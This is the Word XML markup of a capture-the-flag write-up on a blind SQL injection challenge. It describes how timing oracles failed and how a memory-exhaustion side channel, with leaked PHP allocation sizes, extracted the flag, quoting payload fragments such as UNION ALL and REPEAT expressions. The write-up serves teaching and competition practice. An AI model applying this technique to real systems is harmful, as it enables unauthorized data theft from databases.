          <w:pgSz w:h="16838" w:orient="portrait" w:w="11906"/>
          <w:pgMar w:top="1440" w:right="1417" w:bottom="1440" w:left="1701" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType w:fmt="upperRoman" w:start="1"/>
          <w:cols w:num="1" w:sep="0" w:space="1701" w:equalWidth="1"/>
        </w:sectPr>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="742"/>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="180" w:before="380" w:line="380" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="100000" w:name="_Toc100000"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0f2e24"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Executive Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100000"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This writeup documents the full compromise of a blind SQL injection challenge hosted on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">chall.ctf.ae</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. The application consisted of a single PHP file whose only output was a constant joke string, with raw string concatenation of the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">?id=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter directly into a SQL query. The author had built a genuinely thoughtful defense: a PHP shutdown function padde</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">d every response to exactly 2.0 seconds, and a second, invisible layer at the database server killed any statement that ran longer than roughly 2.0 seconds. Together these measures reduced server-side execution time to a constant, uninformative observable.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Every conventional timing oracle died against this wall: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SLEEP()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> from 3 to 18 seconds, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">BENCHMARK()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> burns, conditional </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">IF(cond, SLEEP(6), 0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> splits, and every documented read-only exemption attempt (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">FOR SHARE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">LOCK IN SHARE MODE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">INTO @a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) flatlined at the same 2.21 seconds. The breakthrough came from abandoning time entirely and attacking the client side instead: a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION ALL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload streams an attacker-sized result set into PHP's buffered </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">mysqli</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> client until the 64 MB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">memory_limit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> fataled the interpreter. Because the fatal aborted the script before the final </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, the response body length changed from 4,557 bytes to roughly 167 bytes a clean, reliable one-bit channel.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">With </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">display_errors=on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, the fatal message leaked the exact failed allocation size (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">tried to allocate X bytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">), and X was linear in an attacker-chosen value: encoding a byte as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">REPEAT('A', value * 400000)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> turned each HTTP request into one full character of secret data rather than a single bit. A parallel, resu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">mable Python pipeline extracted the schema, the table and column names, and finally the flag in minutes across rotating 20-minute instances. The recovered flag was verified against the database itself with a full-string equality oracle and matched exactly.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="90" w:before="160" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e5c49"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Final verified flag</w:t>
      </w:r>
      <w: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Look w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="0a120d"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
              <w:left w:val="single" w:color="3ddbb5" w:sz="12" w:space="0"/>
              <w:bottom w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
              <w:right w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="200" w:type="dxa"/>
              <w:top w:w="140" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="5000" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="30" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="3ddbb5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$ ./solve.py --verify</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="30" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="3ddbb5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">[+] equality check ... MATCH</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="3ddbb5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">[+] FLAG: pwnsec{9f5b1c7f391035d1}</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="240" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="90" w:before="160" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e5c49"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 1: Challenge summary at a glance</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="2a7a65" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:bottom w:val="single" w:color="2a7a65" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:insideH w:val="single" w:color="c5d8d0" w:sz="1" w:space="0"/>
          <w:insideV w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="2a7a65"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1500" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Aspect</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="2a7a65"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3500" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Value</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Challenge type</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3500" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Web / blind SQL injection, single PHP endpoint</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Defense layers</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3500" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2.0 s PHP response pad + ~2.0 s DB-side statement killer</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Killed channels</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3500" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Timing (all variants), data output, SQL error output</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Winning channel</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3500" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">PHP memory_limit fatal -&gt; response length + leaked allocation size</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Throughput</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3500" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">~1 request per extracted character, 4-5 parallel workers</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Final flag</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3500" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">pwnsec{9f5b1c7f391035d1} (equality-verified)</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="240" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="742"/>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="180" w:before="380" w:line="380" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="100001" w:name="_Toc100001"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0f2e24"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Challenge Overview and Environment Recon</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100001"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The challenge exposed a single endpoint that rendered its own highlighted source on every request via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">highlight_file(__FILE__, true)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, which meant reconnaissance never had to rely on guesswork: the exact deployed code was always visible in the response. With the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">?id=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter set, the script built a query by raw string concatenation and executed it. Whatever happened next, the response body did not change success and failure both printed the same </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ill try to tell him, dw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
